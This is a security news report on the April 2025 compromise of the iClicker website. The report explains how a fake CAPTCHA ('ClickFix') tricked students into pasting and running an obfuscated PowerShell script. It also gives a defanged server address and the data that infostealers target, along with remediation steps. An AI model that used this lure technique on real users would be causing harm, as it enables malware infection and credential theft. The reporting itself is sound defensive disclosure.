iClicker Site Breach Delivered Malware Through Fake CAPTCHA Attack
The official iClicker website was compromised in mid-April 2025 by a ClickFix attack that leveraged a deceptive CAPTCHA prompt to infect users with malware. The breach specifically impacted users between April 12 and April 16 and targeted college students and instructors across the U.S.
iClicker is a classroom engagement tool widely used in universities like the University of Michigan, University of Florida, and other major institutions, with over 7 million student users and 5,000 instructors.
How the ClickFix Attack Worked
According to a University of Michigan Safe Computing alert, the attack introduced a fake CAPTCHA prompt on the iClicker landing page. When users clicked “I’m not a robot,” the following actions occurred:
- A malicious PowerShell script was silently copied to the Windows clipboard.
- The CAPTCHA then instructed users to:
- Press Win + R to open the Run dialog.
- Paste the script (Ctrl + V).
- Press Enter to execute the script.
This technique, known as a ClickFix social engineering attack, manipulates users into running malware manually under the guise of routine verification.
Malicious Payload Details and Malware Behavior
The PowerShell payload was heavily obfuscated and connected to a remote server at http://67.217.228[.]14:8080. Based on the device type, it delivered different payloads:
- Targeted victims received malware that granted attackers full device access.
- Non-targets (e.g., sandboxes or researchers) were sent a legitimate Microsoft Visual C++ Redistributable installer to avoid detection.
Although the exact malware type varies, security analysts suggest it likely included infostealers, known for collecting:
- Browser data (cookies, passwords, credentials)
- Financial details (credit card info, cryptocurrency wallets, private keys)
- Text files and sensitive documents (e.g.,
seed.txt,wallet.txt,*.pdf)
Stolen data is typically archived and exfiltrated for resale or to fuel broader ransomware campaigns.
Response from iClicker and Macmillan
Though Macmillan, iClicker’s parent company, did not respond to media inquiries, iClicker published a security bulletin on May 6 stating:
“We recently resolved an incident affecting the iClicker landing page (iClicker.com). Importantly, no iClicker data, apps, or operations were impacted…”
The notice confirmed the attacker placed a false CAPTCHA before users logged in. However, the bulletin was tagged with <meta name='robots' content='noindex, nofollow' />, preventing search engines from indexing it and making it harder for users to find.
“Out of an abundance of caution, we recommend that any faculty or student who encountered and clicked on the false Captcha from April 12–April 16 on our website run security software to ensure their devices remain protected.”
Action Required for Affected Users
The following steps are recommended for anyone who interacted with the fake CAPTCHA:
- Immediately change the iClicker password.
- Change all saved passwords on the affected device.
- Run trusted antivirus or security tools.
- Use a password manager (e.g., BitWarden or 1Password) to store unique passwords.
Only users who visited the iClicker website and followed the CAPTCHA prompts are affected. Users of the iClicker mobile app or those who did not encounter the CAPTCHA are not at risk.
